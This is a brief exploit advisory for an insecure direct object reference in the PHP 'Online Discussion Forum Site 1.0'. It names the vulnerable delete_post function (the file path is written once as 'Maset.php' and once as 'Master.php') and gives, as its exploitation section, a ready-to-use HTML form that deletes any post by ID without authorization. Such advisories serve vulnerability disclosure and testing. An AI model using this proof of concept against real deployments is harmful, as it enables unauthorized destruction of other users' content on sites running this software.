Online Discussion Forum Site 1.0 - IDOR / Delete any post
Vendor Homepage: https://www.sourcecodester.com/
Software Link: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html
[#] Vulnerability Location:
function delete_post()
in /odfs/classes/Maset.php:133
[#] Exploitation:
<form action="http://localhost/odfs/classes/Master.php?f=delete_post" method="post" id="manage-user"> <input type="text" name="id" value="" placeholder="enter POST ID to delete" required> <button type="submit">Delete Post</button> </form>